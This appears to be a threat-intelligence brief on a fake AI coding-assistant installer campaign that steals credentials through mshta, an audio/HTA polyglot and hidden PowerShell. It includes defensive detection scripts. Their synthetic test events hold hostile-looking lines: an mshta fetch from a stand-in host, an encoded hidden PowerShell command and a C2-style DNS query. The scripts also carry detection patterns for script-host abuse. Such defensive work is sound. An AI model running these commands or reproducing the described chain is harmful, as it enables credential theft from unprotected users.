EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated cybercrime group that has adopted a fake installer for a popular AI coding assistant. It employs a search‑engine poisoning technique to present a spoofed download page to users searching for installation guides. The operation primarily targets small‑business owners, educators, and hobbyist developers in North America and Europe, sectors that lack dedicated security teams. The attackers’ objective is credential theft, using the counterfeit installer to harvest login data and gain access to personal and corporate accounts.
Victims are directed from the poisoned search result to a counterfeit installation page that instructs them to open the Windows Run dialog and paste a command invoking the system’s HTML application host. The command retrieves a polyglot file that appears as an audio track but also contains an HTA script, allowing it to bypass file‑type filters. Once executed, the script launches a hidden PowerShell process that disables script scanning, decodes additional payloads in memory, and loads a reflective .NET module. The module operates entirely in memory, harvesting stored credentials and transmitting them to a remote command‑and‑control server.
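A content check for the audio/HTA polyglot described above, added here as an illustration and not taken from the cited reports or the campaign: it flags a file that carries an audio container header but also contains markup that only makes sense if the HTML application host is the intended consumer. The two sample inputs are constructed, and the marker list is an assumption about what HTA markup typically contains; extension-based filters would pass the first sample as an audio track.

```python
import re

# Constructed sample: an ID3v2 tag header followed by padding and inert HTA markup.
# This is a synthetic test input, not a sample from the campaign.
SAMPLE_POLYGLOT = (
    b"ID3\x04\x00\x00\x00\x00\x00\x21"        # 10-byte ID3v2 header
    + b"\x00" * 64                            # padding standing in for audio frames
    + b"<html><head><hta:application id='x' showintaskbar='no'/></head>"
    + b"<script language='VBScript'>MsgBox \"constructed\"</script></html>"
)

# Constructed sample: ID3 header plus repeated MPEG frame-sync bytes, no markup.
SAMPLE_CLEAN_AUDIO = b"ID3\x04\x00\x00\x00\x00\x00\x21" + b"\xff\xfb\x90\x00" * 32

# Magic bytes for common audio containers (ID3, MPEG frame sync, RIFF/WAV, Ogg, FLAC).
AUDIO_MAGIC = (b"ID3", b"\xff\xfb", b"\xff\xf3", b"\xff\xf2", b"RIFF", b"OggS", b"fLaC")

# Markers that indicate HTA/script content (assumed set; extend from your own samples).
HTA_MARKERS = {
    "hta_application_tag": re.compile(rb"<hta:application", re.I),
    "script_tag": re.compile(rb"<script\b", re.I),
    "activex_object": re.compile(rb"ActiveXObject\s*\(", re.I),
    "wscript_shell": re.compile(rb"WScript\.Shell", re.I),
}


def looks_like_audio(data: bytes) -> bool:
    """True if the file starts with a known audio container signature."""
    return any(data.startswith(m) for m in AUDIO_MAGIC)


def find_hta_markers(data: bytes) -> list[str]:
    """Names of HTA/script markers present anywhere in the file body."""
    return [name for name, rx in HTA_MARKERS.items() if rx.search(data)]


def classify(data: bytes) -> dict:
    """Combine both signals: audio header AND script markup is the polyglot case."""
    markers = find_hta_markers(data)
    audio = looks_like_audio(data)
    return {
        "audio_header": audio,
        "hta_markers": markers,
        "polyglot_suspect": audio and bool(markers),
    }


if __name__ == "__main__":
    for label, blob in (("polyglot", SAMPLE_POLYGLOT), ("clean", SAMPLE_CLEAN_AUDIO)):
        print(label, classify(blob))
```

The check deliberately scans the whole body rather than only the header, because a polyglot relies on the header looking legitimate; a proxy or mail gateway that applies the same logic to any download whose declared type is audio catches the file regardless of its extension.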
The threat is significant because it targets users who are unlikely to have endpoint protection or network filtering, and it leaves no file artifacts, making traditional antivirus and forensic methods ineffective. The per‑victim subdomain design further hinders shared indicator use, while the in‑memory execution evades process‑based monitoring. Organisations should enforce strict web filtering, block the HTML application host from initiating outbound connections, and monitor for unusual PowerShell activity and DNS queries to unknown domains. Regular user education, timely patching of browsers, and robust credential hygiene are essential to reduce exposure.
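The monitoring recommendations above, turned into detection logic as an added example that is not part of the original report: a handful of rules run over constructed Sysmon-style events (EventID 1 process creation, 3 network connection, 22 DNS query) and flag the chain the campaign uses, the HTML application host launched with a remote URL, PowerShell spawned by it with hidden or encoded arguments, the host itself making an outbound connection, and a script host resolving a domain outside the organisation's allowlist with a random-looking leftmost label. The event field names, the allowlist and every hostname, IP and command line in the sample are assumptions constructed for the example.

```python
import math
import re
from collections import Counter

# Constructed Sysmon-style events; synthetic, not telemetry from the campaign.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe http://download.example.invalid/setup/track.mp3"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 3, "image": r"C:\Windows\System32\mshta.exe",
     "dest_ip": "203.0.113.10", "dest_port": 443},
    {"id": 22, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "query": "k7x2q9v4m1z8.c2.example.invalid"},
    # Benign activity the rules must leave alone.
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"id": 22, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "query": "www.example.com"},
]

ALLOWED_DNS_SUFFIXES = ("example.com",)  # assumption: the org's known-good domains
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe")
REMOTE_URL = re.compile(r"\bhttps?://", re.I)
# Hidden window, encoded command, or no-profile switches on the PowerShell command line.
HIDDEN_FLAGS = re.compile(r"-(w|windowstyle)\s+hidden\b|-(e|ec|enc|encodedcommand)\b|-nop\b", re.I)


def basename(path: str) -> str:
    """Lower-case file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_random(label: str) -> bool:
    """Long, high-entropy DNS label: the shape of a per-victim subdomain."""
    return len(label) >= 10 and shannon_entropy(label) >= 3.0


def dns_allowed(query: str) -> bool:
    q = query.lower().rstrip(".")
    return any(q == s or q.endswith("." + s) for s in ALLOWED_DNS_SUFFIXES)


def evaluate(events: list[dict]) -> list[dict]:
    """Return one alert dict per rule match."""
    alerts = []
    for e in events:
        img = basename(e.get("image", ""))
        if e["id"] == 1:
            parent = basename(e.get("parent", ""))
            cmd = e.get("cmdline", "")
            if img == "mshta.exe" and REMOTE_URL.search(cmd):
                alerts.append({"rule": "mshta_remote_url", "detail": cmd})
            if parent == "mshta.exe" and img in ("powershell.exe", "pwsh.exe"):
                alerts.append({"rule": "mshta_spawns_powershell", "detail": cmd})
            if img in ("powershell.exe", "pwsh.exe") and HIDDEN_FLAGS.search(cmd):
                alerts.append({"rule": "powershell_hidden_or_encoded", "detail": cmd})
        elif e["id"] == 3 and img == "mshta.exe":
            alerts.append({"rule": "mshta_outbound_connection",
                           "detail": f"{e['dest_ip']}:{e['dest_port']}"})
        elif e["id"] == 22 and img in SCRIPT_HOSTS and not dns_allowed(e["query"]):
            alerts.append({"rule": "script_host_dns_unknown_domain",
                           "detail": e["query"],
                           "random_label": looks_random(e["query"].split(".")[0])})
    return alerts


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(a)
```

The network rule fires on any outbound connection by the HTML application host, which mirrors the firewall control recommended above: if that host is blocked from egress, a connection event from it is itself the finding. The DNS rule keys on the issuing process rather than on a blocklist, which is what the per-victim subdomain design defeats.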
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Defense Evasion | T1562.001 | Impair Defenses | Disable or Modify Tools |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Defense Evasion | T1620 | Reflective Code Loading | — |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Command and Control | T1568.002 | Dynamic Resolution | Domain Generation Algorithms |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/hackers-use-fake-claude-code-install-page/
https://www.cyderes.com/howler-cell/fake-claude-code-installer-infostealer